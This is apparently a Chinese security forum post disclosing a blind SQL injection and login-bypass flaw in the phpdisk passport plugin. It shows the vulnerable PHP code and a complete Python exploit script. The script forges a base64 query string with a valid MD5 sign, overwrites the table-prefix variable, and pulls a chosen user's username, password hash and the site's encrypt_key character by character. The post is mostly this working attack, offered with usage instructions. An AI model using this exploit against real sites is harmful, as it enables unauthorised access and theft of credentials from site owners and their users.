phpdisk 盲注和前台任意用户登录漏洞附利用exp

90_

文件 plugins\phpdisk_client\passport.php

1. 
   
2. $str = $_SERVER['QUERY_STRING'];
   
3. if($str){
   
4.     parse_str(base64_decode($str));// 触发函数
   
5. }else{
   
6.     exit('Error Param');
   
7. }
   
8. /*$username = trim(gpc('username','G',''));
   
9. $password = trim(gpc('password','G',''));
   
10. $sign = trim(gpc('sign','G',''));*/
    
11. if($sign!=strtoupper(md5($action.$username.$password))){
    
12.     exit('No data,Code:2!');
    
13. }
    
14. $username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;
    
15. if($action=='passportlogin'){
    
16.     $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1");  //覆盖tpf
    

复制代码

phpdisk.py exploit

1. 
   
2. #===============================================================================
   
3. # Id :phpdisk.y
   
4. # Author:Yaseng
   
5. #===============================================================================
   
6. import   sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
   
7.    
   
8. def cslogo():
   
9.     print '''
   
10.   ___  ___  ____  ____  ____  __      __   _  _
    
11. / __)/ _ \(  _ \( ___)(  _ \(  )    /__\ ( \/ )
    
12. ( (__( (_) ))(_) ))__)  )___/ )(__  /(__)\ \  /
    
13. \___)\___/(____/(____)(__)  (____)(__)(__)(__)
    
14. Name:phpdisk bind sql injection  exploit
    
15. Author:Yaseng [yaseng@uauc.net]
    
16. Usage:phpdisk.py  site[www.yaseng.me]   id[1]
    
17. '''
    
18.    
    
19. # show message
    
20. def msg(text, type=0):
    
21.     if type == 0:
    
22.        str_def = "[*]"
    
23.     elif  type == 1:
    
24.        str_def = "[+]"
    
25.     else:
    
26.        str_def = "[-]";
    
27.     print str_def + text;
    
28.    
    
29. # get url data
    
30. def get_data(url):
    
31.     try:
    
32.       r = urllib2.urlopen(url, timeout=10)
    
33.       return r.read()
    
34.     except :
    
35.      return 0
    
36. def b(url):
    
37.      if   get_data(url).find("ssport Err",0) != -1 :
    
38.         return 0
    
39.      return 1
    
40.    
    
41. def make_plyload(payload):
    
42.      return   target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())  
    
43.    
    
44. def get_username():
    
45.    
    
46.     msg("get  username ...")
    
47.     global  pass_list
    
48.     len=0
    
49.     for i in range(40) :
    
50.          if  b(make_plyload("pd_users  WHERE 1   and   (SELECT  LENGTH(username)  from  pd_users where userid=%d )= %d  #" % (uid,i))):
    
51.             len=i
    
52.             msg("username length:%d" % len,1)
    
53.             break
    
54.     global  key_list
    
55.     key_list=['0','1','2','3','4','5','6','7','8','9']
    
56.     key_list+=map(chr,range(97,123))
    
57.     username=""
    
58.     for i  in range(len) :
    
59.        for key in key_list :
    
60.             t=key
    
61.             if type(key) != int :
    
62.                 t="0x"+binascii.hexlify(key)
    
63.             if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(username,%d,1)   from  pd_users  where userid=%d )=%s #" % (i+1,uid,t)))) :
    
64.              msg("username [%d]:%s" % (i+1,key))
    
65.              username+=key
    
66.              break
    
67.     msg("username:"+username,1)
    
68.     return  username  
    
69.    
    
70. def get_password():   
    
71.    
    
72.      pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
    
73.      password=""
    
74.      for i  in range(32) :
    
75.         for key in pass_list :
    
76.              t=key
    
77.              if type(key) != int :
    
78.                  t="0x"+binascii.hexlify(key)
    
79.              if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(password,%d,1)     from  pd_users  where userid=%d )= %s #" % (i+1,uid,t)))) :
    
80.               msg("password [%d]:%s" % (i+1,key))
    
81.               password+=key
    
82.               break
    
83.      msg("username:"+password,1)
    
84.      return password      
    
85.    
    
86. def get_encrypt_key():
    
87.    
    
88.     msg("get encrypt_key ...")
    
89.     global  pass_list
    
90.     pass_list=map(chr,range(97,123))
    
91.     len=0
    
92.     for i in range(40) :
    
93.         if  b(make_plyload("pd_users  WHERE 1   and   ( SELECT  LENGTH(value)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )=%d  #23" % i)):
    
94.             len=i
    
95.             msg("encrypt_key length:%d" % len,1)
    
96.             break
    
97.     global  key_list
    
98.     key_list=['0','1','2','3','4','5','6','7','8','9']
    
99.     key_list+=map(chr,range(65,91)+range(97,123))
    
100.     encrypt_key=""
     
101.     for i  in range(len) :
     
102.        for key in key_list :
     
103.          t=key
     
104.          if type(key) != int :
     
105.             t="0x"+binascii.hexlify(key)
     
106.          if(b(make_plyload(" pd_users WHERE 1   and   ( SELECT  binary(substr(value,%d,1))  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = %s #" % (i+1,t)))) :
     
107.           msg("key [%d]:%s" % (i+1,key))
     
108.           encrypt_key+=key
     
109.           break
     
110.     msg("encrypt_key:"+encrypt_key,1)
     
111.     return  encrypt_key  
     
112.    
     
113. if __name__ == '__main__':
     
114.    
     
115.    cslogo()
     
116.    if len(sys.argv) > 1 :
     
117.     site=sys.argv[1];
     
118.     global target
     
119.     global uid
     
120.     try :
     
121.      uid=int(sys.argv[2]);
     
122.     except :
     
123.       uid =1
     
124.     target=site+"/plugins/phpdisk_client/passport.php"
     
125.     msg("exploit:"+site)
     
126.    #print get_data(make_plyload(" pd_users WHERE 1   and   ( SELECT  substr(value,2,1)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = 9 %23"))
     
127.     if get_data(target) :
     
128.        username=get_username()
     
129.        if len(username) > 0 :
     
130.          password=get_password()
     
131.          if len(password) == 32 :
     
132.             msg("Succeed: username:%s  password:%s" % (username,password),1)
     
133.     else :
     
134.        msg("vulnerability  not  exits",2);
     
135.        exit();
     

复制代码

作者：yaseng